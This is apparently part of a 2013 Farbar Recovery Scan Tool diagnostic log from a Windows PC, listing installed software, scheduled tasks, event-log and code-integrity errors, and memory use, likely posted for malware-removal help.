Microsoft Office Shared Setup Metadata MUI (English) 2013 (Version: 15.0.4420.1017)
Microsoft OneNote MUI (English) 2013 (Version: 15.0.4420.1017)
Microsoft Outlook MUI (English) 2013 (Version: 15.0.4420.1017)
Microsoft PowerPoint MUI (English) 2013 (Version: 15.0.4420.1017)
Microsoft Primary Interoperability Assemblies 2005 (x32 Version: 8.0.50727.42)
Microsoft Publisher MUI (English) 2013 (Version: 15.0.4420.1017)
Microsoft Reader (x32)
Microsoft Silverlight (Version: 5.1.20913.0)
Microsoft SQL Server 2005 Compact Edition [ENU] (x32 Version: 3.1.0000)
Microsoft SQL Server 2008 (64-bit)
Microsoft SQL Server 2008 Browser (x32 Version: 10.1.2531.0)
Microsoft SQL Server 2008 Common Files (Version: 10.0.1600.22)
Microsoft SQL Server 2008 Common Files (Version: 10.1.2531.0)
Microsoft SQL Server 2008 Database Engine Services (Version: 10.1.2531.0)
Microsoft SQL Server 2008 Database Engine Shared (Version: 10.1.2531.0)
Microsoft SQL Server 2008 Native Client (Version: 10.1.2531.0)
Microsoft SQL Server 2008 R2 Management Objects (x32 Version: 10.50.1447.4)
Microsoft SQL Server 2008 RsFx Driver (Version: 10.1.2531.0)
Microsoft SQL Server 2008 Setup Support Files (Version: 10.1.2731.0)
Microsoft SQL Server Compact 3.5 SP2 ENU (x32 Version: 3.5.8080.0)
Microsoft SQL Server Compact 3.5 SP2 x64 ENU (Version: 3.5.8080.0)
Microsoft SQL Server System CLR Types (x32 Version: 10.50.1447.4)
Microsoft SQL Server VSS Writer (Version: 10.1.2531.0)
Microsoft Visual Basic 2010 Express - ENU (x32 Version: 10.0.30319)
Microsoft Visual C++ 2005 Redistributable (x32 Version: 8.0.50727.42)
Microsoft Visual C++ 2005 Redistributable (x32 Version: 8.0.56336)
Microsoft Visual C++ 2005 Redistributable (x32 Version: 8.0.61001)
Microsoft Visual C++ 2005 Redistributable (x64) - KB2467175 (Version: 8.0.51011)
Microsoft Visual C++ 2005 Redistributable (x64) (Version: 8.0.59192)
Microsoft Visual C++ 2005 Redistributable (x64) (Version: 8.0.61000)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570 (Version: 9.0.30729.5570)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (x32 Version: 9.0.30729.5570)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (Version: 9.0.30729)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (Version: 9.0.30729.4148)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (Version: 9.0.30729.6161)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (x32 Version: 9.0.30729)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (x32 Version: 9.0.30729)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (x32 Version: 9.0.30729.4148)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (x32 Version: 9.0.30729.6161)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (Version: 10.0.40219)
Microsoft Visual C++ 2010 x64 Runtime - 10.0.30319 (Version: 10.0.30319)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (x32 Version: 10.0.40219)
Microsoft Visual Studio 2010 ADO.NET Entity Framework Tools (x32 Version: 10.0.30319)
Microsoft Visual Studio 2010 Express Prerequisites x64 - ENU (Version: 10.0.30319)
Microsoft Word MUI (English) 2013 (Version: 15.0.4420.1017)
Microsoft WSE 3.0 Runtime (x32 Version: 3.0.5305.0)
Microsoft_VC80_ATL_x86 (x32 Version: 8.0.50727.4053)
Microsoft_VC80_ATL_x86_x64 (Version: 8.0.50727.4053)
Microsoft_VC80_CRT_x86 (x32 Version: 8.0.50727.4053)
Microsoft_VC80_CRT_x86_x64 (Version: 8.0.50727.4053)
Microsoft_VC80_MFC_x86 (x32 Version: 8.0.50727.4053)
Microsoft_VC80_MFC_x86_x64 (Version: 8.0.50727.4053)
Microsoft_VC80_MFCLOC_x86 (x32 Version: 8.0.50727.4053)
Microsoft_VC80_MFCLOC_x86_x64 (Version: 80.50727.4053)
Microsoft_VC90_ATL_x86 (x32 Version: 1.00.0000)
Microsoft_VC90_ATL_x86_x64 (Version: 1.00.0000)
Microsoft_VC90_CRT_x86 (x32 Version: 1.00.0000)
Microsoft_VC90_CRT_x86_x64 (Version: 1.00.0000)
Microsoft_VC90_MFC_x86 (x32 Version: 1.00.0000)
Microsoft_VC90_MFC_x86_x64 (Version: 1.00.0000)
Modio (x32)
Mplayer 0.6.9 (x32 Version: 0.6.9)
MSVCRT (x32 Version: 15.4.2862.0708)
MSVCRT_amd64 (x32 Version: 15.4.2862.0708)
MSXML 4.0 SP2 (KB954430) (x32 Version: 4.20.9870.0)
MSXML 4.0 SP2 (KB973688) (x32 Version: 4.20.9876.0)
Multimedia Toolbar (x32 Version: 1.0.0.0)
Nidesoft DVD to AVI Converter Platinum v5.0 (x32)
NOOK for PC (x32 Version: 2.5.6.9575)
Norton Online Backup (x32 Version: 2.1.17869)
NVIDIA PhysX v8.09.04 (x32 Version: 8.09.04)
Outils de vérification linguistique 2013 de Microsoft Office - Français (Version: 15.0.4420.1017)
Pando Media Booster (x32 Version: 2.6.0.1)
PDF Settings CS5 (x32 Version: 10.0)
Penguins! (x32 Version: 2.2.0.95)
PhotoNow! (x32 Version: 1.1.6904)
Picasa 3 (x32 Version: 3.9)
PlanetSide 2 (2) (HKCU)
Plants vs. Zombies (x32 Version: 2.2.0.95)
Poker Superstars III (x32 Version: 2.2.0.95)
Polar Bowler (x32 Version: 2.2.0.95)
Polar Golfer (x32 Version: 2.2.0.95)
Power2Go (x32 Version: 6.1.4204)
PowerDirector (x32 Version: 8.0.3003)
Quicken 2012 (x32 Version: 21.1.7.18)
QuickTime (x32)
Real Alternative 2.0.2 (x32 Version: 2.0.2)
Realtek Ethernet Controller Driver For Windows 7 (x32 Version: 7.21.531.2010)
Realtek High Definition Audio Driver (x32 Version: 6.0.1.6196)
Realtek USB 2.0 Card Reader (x32 Version: 6.1.7600.30117)
Recovery Manager (x32 Version: 5.5.3023)
Roxio CinemaNow 2.0 (x32 Version: 1.0.278)
RtVOsd (Version: 1.0.6)
Service Pack 1 for SQL Server 2008 (KB968369) (64-bit) (Version: 10.1.2531.0)
Skype™ 5.10 (x32 Version: 5.10.116)
Spotify (HKCU Version: 0.9.6.72.ge389c074)
Sql Server Customer Experience Improvement Program (Version: 10.1.2531.0)
Stitch Era Universal (x32 Version: 11.30)
Subliminal blaster (x32)
Synaptics Pointing Device Driver (Version: 15.3.29.0)
Unity Web Player (HKCU Version: )
Update for Microsoft .NET Framework 4 Client Profile (KB2468871) (x32 Version: 1)
Update for Microsoft .NET Framework 4 Client Profile (KB2473228) (x32 Version: 1)
Update for Microsoft .NET Framework 4 Client Profile (KB2533523) (x32 Version: 1)
Update for Microsoft .NET Framework 4 Client Profile (KB2600217) (x32 Version: 1)
Update for Microsoft .NET Framework 4 Client Profile (KB2836939) (x32 Version: 1)
Update for Microsoft .NET Framework 4 Client Profile (KB2836939v3) (x32 Version: 3)
Update for Microsoft .NET Framework 4 Extended (KB2468871) (x32 Version: 1)
Update for Microsoft .NET Framework 4 Extended (KB2533523) (x32 Version: 1)
Update for Microsoft .NET Framework 4 Extended (KB2600217) (x32 Version: 1)
Update for Microsoft .NET Framework 4 Extended (KB2836939) (x32 Version: 1)
Update for Microsoft .NET Framework 4 Extended (KB2836939v3) (x32 Version: 3)
Update for Microsoft Access 2013 (KB2768008) 64-Bit Edition
Update for Microsoft InfoPath 2013 (KB2752078) 64-Bit Edition
Update for Microsoft Lync 2013 (KB2817678) 64-Bit Edition
Update for Microsoft Lync 2013 (KB2825630) 64-Bit Edition
Update for Microsoft Office 2013 (KB2726954) 64-Bit Edition
Update for Microsoft Office 2013 (KB2726996) 64-Bit Edition
Update for Microsoft Office 2013 (KB2738038) 64-Bit Edition
Update for Microsoft Office 2013 (KB2760224) 64-Bit Edition
Update for Microsoft Office 2013 (KB2760242) 64-Bit Edition
Update for Microsoft Office 2013 (KB2760257) 64-Bit Edition
Update for Microsoft Office 2013 (KB2760267) 64-Bit Edition
Update for Microsoft Office 2013 (KB2760539) 64-Bit Edition
Update for Microsoft Office 2013 (KB2760553) 64-Bit Edition
Update for Microsoft Office 2013 (KB2760610) 64-Bit Edition
Update for Microsoft Office 2013 (KB2767845) 64-Bit Edition
Update for Microsoft Office 2013 (KB2768016) 64-Bit Edition
Update for Microsoft Office 2013 (KB2817309) 64-Bit Edition
Update for Microsoft Office 2013 (KB2817311) 64-Bit Edition
Update for Microsoft Office 2013 (KB2817314) 64-Bit Edition
Update for Microsoft Office 2013 (KB2817316) 64-Bit Edition
Update for Microsoft Office 2013 (KB2817490) 64-Bit Edition
Update for Microsoft Office 2013 (KB2817626) 64-Bit Edition
Update for Microsoft Office 2013 (KB2817640) 64-Bit Edition
Update for Microsoft Office 2013 (KB2827225) 64-Bit Edition
Update for Microsoft Office 2013 (KB2827230) 64-Bit Edition
Update for Microsoft Office 2013 (KB2827239) 64-Bit Edition
Update for Microsoft Office 2013 (KB2837643) 64-Bit Edition
Update for Microsoft Office 2013 (KB2837649) 64-Bit Edition
Update for Microsoft OneNote 2013 (KB2837642) 64-Bit Edition
Update for Microsoft PowerPoint 2013 (KB2726947) 64-Bit Edition
Update for Microsoft PowerPoint 2013 (KB2817625) 64-Bit Edition
Update for Microsoft Project 2013 (KB2767859) 64-Bit Edition
Update for Microsoft Publisher 2013 (KB2752097) 64-Bit Edition
Update for Microsoft SkyDrive Pro (KB2837652) 64-Bit Edition
Update for Microsoft Visio 2013 (KB2752018) 64-Bit Edition
Update for Microsoft Visio Viewer 2013 (KB2768338) 64-Bit Edition
Update for Microsoft Word 2013 (KB2817631) 64-Bit Edition
Update for Microsoft Word 2013 (KB2837630) 64-Bit Edition
VC80CRTRedist - 8.0.50727.4053 (x32 Version: 1.1.0)
Virtual Families (x32 Version: 2.2.0.95)
Virtual Villagers - The Secret City (x32 Version: 2.2.0.95)
Visual C++ 8.0 ATL (x86) WinSXS MSM (x32 Version: 8.0.50727.762)
Visual C++ 8.0 CRT (x86) WinSXS MSM (x32 Version: 8.0.50727.762)
Visual Studio 2008 x64 Redistributables (x32 Version: 10.0.0.2)
Visual Studio 2010 Tools for SQL Server Compact 3.5 SP2 ENU (x32 Version: 4.0.8080.0)
Visual Studio 2010 x64 Redistributables (Version: 13.0.0.1)
Visual Studio 2012 x64 Redistributables (Version: 14.0.0.1)
Visual Studio 2012 x86 Redistributables (x32 Version: 14.0.0.1)
Vuze (x32 Version: 5.1.0.0)
Vuze Remote Toolbar v6.6 (x32 Version: 6.6)
Wheel of Fortune 2 (x32 Version: 2.2.0.95)
Windows Live Communications Platform (x32 Version: 15.4.3502.0922)
Windows Live Essentials (x32 Version: 15.4.3502.0922)
Windows Live Family Safety (Version: 15.4.3502.0922)
Windows Live ID Sign-in Assistant (Version: 7.250.4225.0)
Windows Live Installer (x32 Version: 15.4.3502.0922)
Windows Live Language Selector (Version: 15.4.3502.0922)
Windows Live Mail (x32 Version: 15.4.3502.0922)
Windows Live Mesh (x32 Version: 15.4.3502.0922)
Windows Live Mesh ActiveX Control for Remote Connections (x32 Version: 15.4.5722.2)
Windows Live Messenger (x32 Version: 15.4.3502.0922)
Windows Live Messenger Companion Core (x32 Version: 15.4.3502.0922)
Windows Live MIME IFilter (Version: 15.4.3502.0922)
Windows Live Movie Maker (x32 Version: 15.4.3502.0922)
Windows Live Photo Common (x32 Version: 15.4.3502.0922)
Windows Live Photo Gallery (x32 Version: 15.4.3502.0922)
Windows Live PIMT Platform (x32 Version: 15.4.3502.0922)
Windows Live Remote Client (Version: 15.4.5722.2)
Windows Live Remote Client Resources (Version: 15.4.5722.2)
Windows Live Remote Service (Version: 15.4.5722.2)
Windows Live Remote Service Resources (Version: 15.4.5722.2)
Windows Live SOXE (x32 Version: 15.4.3502.0922)
Windows Live SOXE Definitions (x32 Version: 15.4.3502.0922)
Windows Live Sync (x32 Version: 14.0.8117.416)
Windows Live UX Platform (x32 Version: 15.4.3502.0922)
Windows Live UX Platform Language Pack (x32 Version: 15.4.3502.0922)
Windows Live Writer (x32 Version: 15.4.3502.0922)
Windows Live Writer Resources (x32 Version: 15.4.3502.0922)
Windows Media Encoder 9 Series (x32 Version: 9.00.2980)
Windows Media Encoder 9 Series (x32)
WinImage (x32)
WinRAR archiver (x32)
WinX DVD Author 6.3 (x32)
WinZip 17.0 (Version: 17.0.10283)
Yahoo Browser Settings (x32)
Zuma Deluxe (x32 Version: 2.2.0.95)

==================== Restore Points =========================

06-12-2013 23:33:28 Windows Update
08-12-2013 02:15:51 OTL Restore Point - 12/7/2013 6:15:44 PM
08-12-2013 08:49:57 Windows Update
09-12-2013 01:31:53 OTL Restore Point - 12/8/2013 5:31:46 PM
09-12-2013 08:53:04 Windows Update
09-12-2013 09:03:39 OTL Restore Point - 12/9/2013 1:03:32 AM
11-12-2013 02:54:00 Installed AVG 2014
11-12-2013 02:55:09 Installed AVG 2014

==================== Hosts content: ==========================

2013-02-07 00:31 - 2013-12-09 01:04 - 00000098 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 localhost
::1 localhost

==================== Scheduled Tasks (whitelisted) =============

Task: {01B68D5A-8E09-4A29-9387-DA754C41BD4E} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2011-06-10] (Google Inc.)
Task: {026F61A6-1E79-4C96-B077-DE27CC432D7D} - \BrowserDefendert No Task File
Task: {1A3CE392-422E-47DC-9602-789171E5B529} - System32\Tasks\Test TimeTrigger => C:\Users\JONLOW~1\AppData\Local\Temp\Runner.exe
Task: {1F09685D-CAD9-4E68-946B-B50B5A191459} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2012-10-01] (Microsoft Corporation)
Task: {351B0865-9F68-49D7-BE8E-68334DE59293} - System32\Tasks\Registry Optimizer_UPDATES => C:\Program Files (x86)\WinZip Registry Optimizer\Winzipro.exe
Task: {43F7265C-490F-4AA9-8B69-02F9F833D97A} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2013-01-23] (Piriform Ltd)
Task: {4F5A0FE5-2186-4857-AAE6-91B0862813D9} - System32\Tasks\AdobeAAMUpdater-1.0-JonLowry-HP-Jon Lowry => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\updaterstartuputility.exe [2010-03-06] (Adobe Systems Incorporated)
Task: {5CCDBEE0-159F-4BF5-88B1-44DE44C0189A} - \BackgroundContainer Startup Task No Task File
Task: {62772B60-D13A-4B4F-8121-0BF2B8748E73} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2013-12-06] (AVAST Software)
Task: {70A3A76A-8A55-492C-9AC2-01CCE7F4FE56} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2013-11-17] (Adobe Systems Incorporated)
Task: {73C09C2B-B3BE-4A72-AB85-EA3D923BB7CC} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2013-10-15] (Hewlett-Packard)
Task: {7FB07DDB-2792-4DE2-9210-A87BA1C86AE6} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2012-09-27] (Hewlett-Packard Company)
Task: {A3E483DF-5EE2-495D-B541-F69C269639DF} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2012-10-01] (Microsoft Corporation)
Task: {A669AEF8-A05B-44A1-9833-CD4A0CF0501C} - \Desk 365 RunAsStdUser No Task File
Task: {A986945B-2301-4B1D-A825-A862F3670DD8} - System32\Tasks\{F967C586-0347-4CC0-A8D0-5FFDB5547DF0} => C:\Program Files (x86)\NetDragon\ZeroOnline\play.exe
Task: {AD9C175E-9C24-4A60-8DEF-912BB1A6B588} - System32\Tasks\TidyNetwork Update => C:\Users\Jon Lowry\AppData\Local\TidyNetwork.com\tidy2update.exe
Task: {ADDB8A9E-F812-43FF-9A3E-E2CB947FB2FE} - System32\Tasks\Registry Optimizer_DEFAULT => C:\Program Files (x86)\WinZip Registry Optimizer\Winzipro.exe
Task: {B57B8587-1A4E-4B67-A4C8-33074EE6FC52} - System32\Tasks\{295CD046-BB03-4242-9AC9-352599CCE0B9} => C:\Program Files (x86)\NetDragon\ZeroOnline\play.exe
Task: {B9E77F31-4A63-4B57-826B-D176A282D2F2} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-538650268-2924358156-1730836174-1000UA => C:\Users\Jon Lowry\AppData\Local\Facebook\Update\FacebookUpdate.exe [2012-08-10] (Facebook Inc.)
Task: {CAD644F0-F30D-4FC3-AAB5-2B883CB6B5EA} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2012-09-27] (Hewlett-Packard Company)
Task: {CE0FB55B-53C0-43D5-B13F-32521356F6CA} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2013-09-26] ()
Task: {D06D4BC6-2B62-4156-B8D5-DF40D83C52FC} - System32\Tasks\Microsoft Office 15 Sync Maintenance for WOLFLING-Jon Lowry Wolfling => C:\Program Files\Microsoft Office\Office15\MSOSYNC.EXE [2012-10-01] (Microsoft Corporation)
Task: {DDCBFF31-CDF9-4CDD-87A6-37B4606ADA41} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-538650268-2924358156-1730836174-1000Core => C:\Users\Jon Lowry\AppData\Local\Facebook\Update\FacebookUpdate.exe [2012-08-10] (Facebook Inc.)
Task: {E038FBBD-C5A9-4CC0-9E27-461A3131A519} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\OFFICE15\OLicenseHeartbeat.exe [2012-10-01] (Microsoft Corporation)
Task: {E1406E25-6F18-4A2B-8352-33EACA44E719} - System32\Tasks\Registry Optimizer => C:\Program Files (x86)\WinZip Registry Optimizer\Winzipro.exe
Task: {E6E847CE-EBF4-446D-A85F-BB665A6BF29B} - System32\Tasks\HPCeeScheduleForJon Lowry => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2010-09-13] (Hewlett-Packard)
Task: {E7F27CA2-7095-46A3-B555-CA1986F8895D} - \GoforFilesUpdate No Task File
Task: {F3BA2ECB-51CD-4D63-9876-9E4500693B5B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2011-06-10] (Google Inc.)
Task: {F438A944-39F2-4DB5-9518-08D8D99EA88B} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2012-09-05] (Hewlett-Packard Company)
Task: {F800B797-8F84-4A00-A941-01C35959EC2E} - System32\Tasks\MirageAgent => C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe [2010-08-02] (CyberLink)
Task: {FA93F109-BB75-4A50-871F-313583F9CDB2} - System32\Tasks\Microsoft\Windows\Media Center\Extender\Update media permissions for Mcx1-WOLFLING => C:\Windows\ehome\McxTask.exe [2009-07-13] (Microsoft Corporation)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-538650268-2924358156-1730836174-1000Core.job => C:\Users\Jon Lowry\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-538650268-2924358156-1730836174-1000UA.job => C:\Users\Jon Lowry\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\HPCeeScheduleForJon Lowry.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe

==================== Loaded Modules (whitelisted) =============

2013-10-17 11:25 - 2013-10-17 11:25 - 08866472 _____ () C:\Program Files\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2013-03-13 12:48 - 2013-03-13 12:48 - 24978944 _____ () C:\Users\Jon Lowry\AppData\Roaming\Dropbox\bin\libcef.dll
2011-03-21 10:57 - 2011-03-21 10:57 - 00096112 _____ () C:\Program Files (x86)\DivX\DivX Update\DivXUpdateCheck.dll
2013-08-15 00:45 - 2013-08-15 00:45 - 00170496 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\eff228aa396c1d45248a54b44d7ce5a0\IsdiInterop.ni.dll
2010-12-27 14:13 - 2010-04-13 08:52 - 00058880 _____ () C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IsdiInterop.dll
2013-10-17 11:25 - 2013-10-17 11:25 - 08866472 _____ () C:\Program Files (x86)\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2013-12-05 13:21 - 2013-12-03 18:47 - 00702416 _____ () C:\Program Files (x86)\Google\Chrome\Application\31.0.1650.63\libglesv2.dll
2013-12-05 13:21 - 2013-12-03 18:47 - 00099792 _____ () C:\Program Files (x86)\Google\Chrome\Application\31.0.1650.63\libegl.dll
2013-12-05 13:21 - 2013-12-03 18:48 - 04055504 _____ () C:\Program Files (x86)\Google\Chrome\Application\31.0.1650.63\pdf.dll
2013-12-05 13:21 - 2013-12-03 18:48 - 00399312 _____ () C:\Program Files (x86)\Google\Chrome\Application\31.0.1650.63\ppGoogleNaClPluginChrome.dll
2013-12-05 13:21 - 2013-12-03 18:47 - 01619408 _____ () C:\Program Files (x86)\Google\Chrome\Application\31.0.1650.63\ffmpegsumo.dll

==================== Alternate Data Streams (whitelisted) =========

AlternateDataStreams: C:\ProgramData\Temp:0B4227B4
AlternateDataStreams: C:\ProgramData\Temp:373E1720
AlternateDataStreams: C:\ProgramData\Temp:BF3D62E7

==================== Safe Mode (whitelisted) ===================


==================== Faulty Device Manager Devices =============

Name: Deskjet F4500 series
Description: Deskjet F4500 series
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: HP
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


==================== Event log errors: =========================

Application errors:
==================
Error: (12/10/2013 06:40:00 PM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 3198

Error: (12/10/2013 06:40:00 PM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 3198

Error: (12/10/2013 06:40:00 PM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (12/10/2013 06:50:10 PM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 2106

Error: (12/10/2013 06:50:10 PM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 2106

Error: (12/10/2013 06:50:10 PM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (12/10/2013 06:50:09 PM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 1076

Error: (12/10/2013 06:50:09 PM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 1076

Error: (12/10/2013 06:50:09 PM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (12/10/2013 06:50:45 PM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 7161


System errors:
=============
Error: (12/10/2013 07:00:27 PM) (Source: Service Control Manager) (User: )
Description: The AVG Firewall service terminated with service-specific error %%-536805289.

Error: (12/10/2013 06:40:39 PM) (Source: Service Control Manager) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
ASPI32
SydexFDD

Error: (12/10/2013 06:40:32 PM) (Source: Service Control Manager) (User: )
Description: The MCSTRM service failed to start due to the following error:
%%2

Error: (12/10/2013 06:40:07 PM) (Source: Application Popup) (User: )
Description: \SystemRoot\SysWow64\Drivers\ASPI32.SYS has been blocked from loading due to incompatibility with this system. Please contact your software vendor for a compatible version of the driver.

Error: (12/10/2013 06:41:16 PM) (Source: Service Control Manager) (User: )
Description: The Windows Search service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 30000 milliseconds: Restart the service.

Error: (12/10/2013 06:41:16 PM) (Source: Service Control Manager) (User: )
Description: The Windows Search service terminated with service-specific error %%-1073473535.

Error: (12/10/2013 06:40:42 PM) (Source: Service Control Manager) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
ASPI32
Avgldx64
SydexFDD

Error: (12/10/2013 06:40:32 PM) (Source: Service Control Manager) (User: )
Description: The MCSTRM service failed to start due to the following error:
%%2

Error: (12/10/2013 06:40:31 PM) (Source: Service Control Manager) (User: )
Description: The AVG WatchDog service terminated with service-specific error %%-536805315.

Error: (12/10/2013 06:40:28 PM) (Source: Service Control Manager) (User: )
Description: The AVGIDSAgent service terminated with service-specific error %%-536753637.


Microsoft Office Sessions:
=========================
Error: (12/10/2013 06:40:00 PM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 3198

Error: (12/10/2013 06:40:00 PM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: m->NextScheduledEvent 3198

Error: (12/10/2013 06:40:00 PM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (12/10/2013 06:50:10 PM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 2106

Error: (12/10/2013 06:50:10 PM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: m->NextScheduledEvent 2106

Error: (12/10/2013 06:50:10 PM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (12/10/2013 06:50:09 PM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 1076

Error: (12/10/2013 06:50:09 PM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: m->NextScheduledEvent 1076

Error: (12/10/2013 06:50:09 PM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (12/10/2013 06:50:45 PM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 7161


CodeIntegrity Errors:
===================================
Date: 2013-12-06 15:01:19.260
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2013-12-06 15:01:18.949
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2013-12-06 15:01:18.621
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2013-12-06 15:01:18.279
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2013-09-01 17:07:34.814
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2013-09-01 17:07:34.642
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2013-09-01 17:07:34.455
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2013-09-01 17:07:34.284
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2013-09-01 16:55:57.680
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2013-09-01 16:55:57.508
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.


==================== Memory info ===========================

Percentage of memory in use: 54%
Total physical RAM: 3893.86 MB
Available physical RAM: 1769.34 MB
